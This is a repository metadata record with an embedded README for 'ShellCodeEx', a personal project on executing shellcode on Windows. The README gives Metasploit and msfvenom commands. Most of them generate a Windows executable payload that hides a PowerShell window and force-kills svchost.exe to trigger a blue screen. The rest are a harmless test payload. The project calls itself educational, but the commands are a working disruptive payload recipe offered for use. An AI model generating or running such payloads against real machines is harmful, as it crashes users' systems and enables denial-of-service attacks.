{"id":22164397,"url":"https://github.com/zalexanninev15/shellcodeex","last_synced_at":"2026-04-29T09:06:56.568Z","repository":{"id":265706506,"uuid":"896521904","full_name":"Zalexanninev15/ShellCodeEx","owner":"Zalexanninev15","description":"My personal experiment on executing shellcode on Windows.","archived":false,"fork":false,"pushed_at":"2024-12-03T11:29:37.000Z","size":154,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-12T20:32:12.904Z","etag":null,"topics":["bsod","shellcode","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Zalexanninev15.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-11-30T15:33:03.000Z","updated_at":"2024-12-03T11:29:41.000Z","dependencies_parsed_at":"2025-06-12T20:32:15.511Z","dependency_job_id":null,"html_url":"https://github.com/Zalexanninev15/ShellCodeEx","commit_stats":null,"previous_names":["zalexanninev15/shellcodeex"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/Zalexanninev15/ShellCodeEx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zalexanninev15%2FShellCodeEx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zalexanninev15%2FShellCodeEx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zalexanninev15%2FShellCodeEx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zalexanninev15%2FShellCodeEx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Zalexanninev15","download_url":"https://codeload.github.com/Zalexanninev15/ShellCodeEx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zalexanninev15%2FShellCodeEx/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259522451,"owners_count":22870469,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bsod","shellcode","shellcode-loader"],"created_at":"2024-12-02T05:07:33.702Z","updated_at":"2026-04-29T09:06:56.518Z","avatar_url":"https://github.com/Zalexanninev15.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ShellCodeEx\n\n[![](https://img.shields.io/badge/platform-Windows-informational)](https://github.com/Zalexanninev15/ShellCodeEx)\n[![](https://img.shields.io/badge/written_on-C-000000.svg?logo=c)](https://github.com/Zalexanninev15/ShellCodeEx)\n[![](https://img.shields.io/badge/written_on-.NET_9-651DE5.svg?logo=dotnet)](https://dotnet.microsoft.com/download/dotnet/6.0)\n[![](https://img.shields.io/badge/written_on-C%23-%23239120.svg?logo=sharp\u0026logoColor=white)](https://github.com/Zalexanninev15/SharkRemoteV4)\n[![](https://img.shields.io/github/v/release/Zalexanninev15/ShellCodeEx)](https://github.com/Zalexanninev15/ShellCodeEx/releases/latest)\n[![](https://img.shields.io/github/downloads/Zalexanninev15/ShellCodeEx/total.svg)](https://github.com/Zalexanninev15/ShellCodeEx/releases)\n[![](https://img.shields.io/github/last-commit/Zalexanninev15/ShellCodeEx/main.svg)](https://github.com/Zalexanninev15/ShellCodeEx/commits/main)\n[![](https://img.shields.io/github/stars/Zalexanninev15/ShellCodeEx.svg)](https://github.com/Zalexanninev15/ShellCodeEx/stargazers)\n[![](https://img.shields.io/github/forks/Zalexanninev15/ShellCodeEx.svg)](https://github.com/Zalexanninev15/ShellCodeEx/network/members)\n[![](https://img.shields.io/badge/license-GPLv3-ligthgreen.svg)](LICENSE)\n[![](https://img.shields.io/badge/Donate-FFDD00.svg?logo=buymeacoffee\u0026logoColor=black)](https://z15.neocities.org/donate)\n\n## Description\n\nMy personal experiment on executing shellcode on Windows. For educational purposes!!!\n\n## Kali Linux commands for generate shellcode\n\nInstall Metasploit Framework:\n\n```bash\nsudo apt install metasploit-framework -y\n```\n\n### Test shellcode\n\n```bash\nmsfconsole -x \"use payload/windows/x64/exec; set CMD 'powershell -c \\\"ls\\\" \u0026\u0026 pause'; generate -f ps1; exit\"\n```\n\n### Generate BSOD (building an executable file)\n\n```bash\nmsfvenom --platform windows --arch x64 -p windows/x64/exec CMD='cmd.exe /c start /min powershell -Command \"Start-Process cmd -ArgumentList \\\"/c taskkill /F /IM svchost.exe\\\" -WindowStyle Hidden\"' -b '\\x00\\x0A\\x0D' -f exe -o bsod_kali.exe\n```\n\n### Generate BSOD\n\n```bash\nmsfconsole\n\u003e use payload/windows/x64/exec\n\u003e set CMD cmd.exe /c start /min powershell -Command \\\"Start-Process cmd -ArgumentList \\\\\\\"/c taskkill /F /IM svchost.exe\\\\\\\" -WindowStyle Hidden\\\"\n\u003e exit\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzalexanninev15%2Fshellcodeex","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzalexanninev15%2Fshellcodeex","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzalexanninev15%2Fshellcodeex/lists"}